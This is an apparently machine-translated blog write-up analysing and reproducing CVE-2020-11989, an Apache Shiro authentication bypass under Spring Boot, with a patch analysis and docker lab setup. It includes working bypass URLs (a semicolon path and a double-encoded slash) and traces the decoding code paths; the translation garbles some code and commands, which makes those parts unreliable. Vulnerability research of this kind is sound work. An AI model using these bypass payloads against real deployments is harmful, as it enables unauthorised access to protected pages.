Shulou(Shulou.com)05/31 Report--

This article introduces you how to Apache Shiro permissions to bypass the vulnerability CVE-2020-11989 mining analysis and reproduction, the content is very detailed, interested friends can refer to, hope to be helpful to you.

1.1 statu

Complete vulnerability mining condition analysis and vulnerability reproduction.

1.2 introduction

As a Java framework, Apache Shiro can be used for authentication, authorization and other tasks.

When integrating Apache Shiro into Spring Boot, requests may lead to the phenomenon of ultra vires bypassing authentication, and there are two better utilization phenomena, called utilization method 1 and utilization method 2.

Version with security flaw: Apache Shiro version prior to 1.5.3. JDK:1.8.0_181 .

1.3 vulnerability mining capability conditions

The logical function of the source code of Spring Boot and Apache Shiro framework should be clear.

Clear common characteristics of anti-filtering and unconventional characters.

1.4 use method 11.4.1 environment

Set the Tomcat root directory to "/ test/" [only Apache Shiro 1.5.2 has this strict restriction], port 8088; set the ". / admin/*" path to require authentication access, and display "hello, admin page" if you succeed. For more information, please see the source code (https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code/tree/main/springboot-shiro-master0)).

1.4.2 goal

Bypass authentication access to the ". / admin/*" path.

1.4.3 Analysis method

For the malicious URL "http://localhost:8088/;/test/admin/page" entered, Shiro is first used for permission verification. The decodeAndCleanUriString method of the Shiro framework intercepts the first part of the URI "/; / test//admin/page" based on ";", making the request pass permission verification. The important classes and methods passed in turn are as follows:

Class + method

Key content

Org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getChain

-

Org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getPathWithinApplication

String contextPath = getContextPath (request); [= "/; / test"]

String requestUri = getRequestUri (request)

# output as the input value for permission verification of Shiro

If (StringUtils.startsWithIgnoreCase (requestUri, contextPath)) {

/ / Normal case: URI contains context path.

String path = requestUri.substring (contextPath.length ())

Return (StringUtils.hasText (path)? Path: "/")

} else {

/ / Special case: rather unusual.

Return requestUri

}

Org.apache.shiro.web.util.WebUtils#getRequestUri

Uri = valueOrEmpty (request.getContextPath ()) + "/" + valueOrEmpty (request.getServletPath ()) + valueOrEmpty (request.getPathInfo ()); [= "/; / test//admin/page"]

Return normalize (decodeAndCleanUriString (request, uri))

Org.apache.shiro.web.util.WebUtils#decodeAndCleanUriString

Int semicolonIndex = uri.indexOf (';')

The URL is then parsed in the Spring framework. The key point is that in the decoding process, only ";" in the URI is removed and all other contents are preserved, thus parsing the target path "/ admin/page". The important classes and methods passed in turn are as follows:

Class + method

Key content

Org.springframework.web.util.UrlPathHelper#getPathWithinServletMapping

String pathWithinApp = getPathWithinApplication (request)

String servletPath = getServletPath (request)

Return servletPath

Org.springframework.web.util.UrlPathHelper#getPathWithinApplication

String contextPath = getContextPath (request); [= "/; / test"]

String requestUri = getRequestUri (request)

Return requestUri

Org.springframework.web.util.UrlPathHelper#getRequestUri

String uri = (String) request.getAttribute (WebUtils.INCLUDE_REQUEST_URI_ATTRIBUTE); [= "/; / test/admin/page"]

Return decodeAndCleanUriString (request, uri)

Org.springframework.web.util.UrlPathHelper#decodeAndCleanUriString

Uri = removeSemicolonContent (uri); [= "/ / test/admin/ page"]

Uri = decodeRequestString (request, uri); [= "/ / test/ admin / page"]

Uri = getSanitizedPath (uri); [= "/ / test/ admin/ page"]

Return uri

Org.springframework.web.util.UrlPathHelper#getServletPath

String servletPath = (String) request.getAttribute (WebUtils.INCLUDE_SERVLET_PATH_ATTRIBUTE); [= "/ admin/page"]

Return servletPath; [= "/ admin/page"]

1.5 use method 21.5.1 environment

Set the Tomcat root directory to "/ test/" [only Apache Shiro 1.5.2 has this strict restriction], and the port is 8081; set the ". / admin/*" path to require authentication access, and display "hello,admin" if you succeed. For specific configuration, please see the source code (https://github.com/HYWZ36/HYWZ36-CVE-2020-11989-code/tree/main/springboot-shiro-master)).

1.5.2 Target

Bypass authentication access to the ". / admin/ {name}" path.

1.5.3 Analysis method

For the malicious URL "http://localhost:8081/test/admin/a%25%32%66a" entered, Shiro is first used for permission verification. The decodeRequestString method of the Shiro framework decodes twice to get URI "/ admin/a/a" and makes the request pass permission verification because the length of the split array is larger than the template "/ admin/*". The important classes and methods passed in turn are as follows:

Class + method

Key content

Org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#getChain

String requestURI = getPathWithinApplication (request)

If (pathMatches (pathPattern, requestURI)) {.

Return null

Org.apache.shiro.web.util.WebUtils#getPathWithinApplication

String contextPath = getContextPath (request); [= "/ test"]

String requestUri = getRequestUri (request)

Org.apache.shiro.web.util.WebUtils#getRequestUri

Uri = valueOrEmpty (request.getContextPath ()) + "/" + valueOrEmpty (request.getServletPath ()) + valueOrEmpty (request.getPathInfo ()); [= "/ test/ / admin/a%2fa"]

Return normalize (decodeAndCleanUriString (request, uri))

Org.apache.shiro.web.util.WebUtils#decodeAndCleanUriString

Uri = decodeRequestString (request, uri)

Return (semicolonIndex! =-1? Uri.substring (0, semicolonIndex): uri)

Org.apache.shiro.web.util.WebUtils#decodeRequestString

Return URLDecoder.decode (source, enc)

Java.net.URLDecoder#decode (java.lang.String, java.lang.String)

# decodable "2f" as "/"

While (I)

< numChars) { c = s.charAt(i); switch (c) { case '+': sb.append(' '); i++; needToChange = true; break; case '%':………… return (needToChange? sb.toString() : s); 【="/test//admin/a/a"】 org.apache.shiro.web.filter.mgt.PathMatchingFilterChainResolver#pathMatches return pathMatcher.matches(pattern, path); 【pattern : " / admin/*"，source: " / admin/ a / a "】 org.apache.shiro.util.PatternMatcher#matches return match(pattern, source); org.apache.shiro.util.AntPathMatcher#doMatch #判断得模板长度短于URI长度，说明URI和当前模板不属于同一类。 if (pathIdxStart >

PathIdxEnd) {

/ / Path is exhausted, only match if rest of pattern is * or * *

……

} else if (pattIdxStart > pattIdxEnd) {

/ / String not exhausted, but pattern is. Failure.

Return false

The URL is then parsed in the Spring framework. The key point is that during the decoding process, only the decoded path is "/ test/admin/a%252f", so it can be accessed normally in accordance with the "/ admin/ {name}" rule. The important classes and methods passed in turn are as follows:

Class + method

Key content

Javax.servlet.Servlet#service

-

Javax.servlet.http.HttpServlet#doGet

-

1.6 Patch Analysis

As shown in the following figure, the org.apache.shiro.web.util.WebUtils#getPathWithinApplication is modified and two standard methods are used to obtain the URI to effectively respond to "/; / …" Security defect, and no decoding operation to effectively deal with the "a% 25% 32% 66a" security defect.

1.7 docker recurrence

Example of loading container tar as an image:

Cat. / ubuntu-xxx.tar | docker import-ubuntu-new

Examples of setting up local area network and container ip and starting container:

(1) Custom network

Docker network create-subnet=192.168.10.1/24 testnet

(2) start the docker container

Docker run-p 8088 hostname testt3 8088-p 8081 hostname testt3 8081-it-- hostname testt3-- network testnet-- ip 10.10.10.100 ubuntuxxx:xxx / bin/bash

The name of the image is ubuntu_cve-2020-11989:v1, and the port mapping function of 8088 and 8081 needs to be enabled.

After booting into the container, reproduce the utilization method 1. Change to the directory [/ springboot-shiro-master0/target] and execute the command [java-jar srpingboot-shiro-0.0.1-SNAPSHOT.jar]. Then enter [http://localhost:8088/;/test/admin/page] in the host browser, and the successful access indicates that the reproduction is successful, as shown below.

Recurrence and utilization method II. Interrupt the current program, change to the directory [/ springboot-shiro-master1/target], and execute the command [java-jar srpingboot-shiro-0.0.1-SNAPSHOT.jar]. Then enter [http://localhost:8081/test/admin/a%25%32%66a] in the host browser, and the successful access indicates that the reproduction is successful, as shown below.

On how to Apache Shiro permissions to bypass the vulnerability CVE-2020-11989 mining analysis and reproduction is shared here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.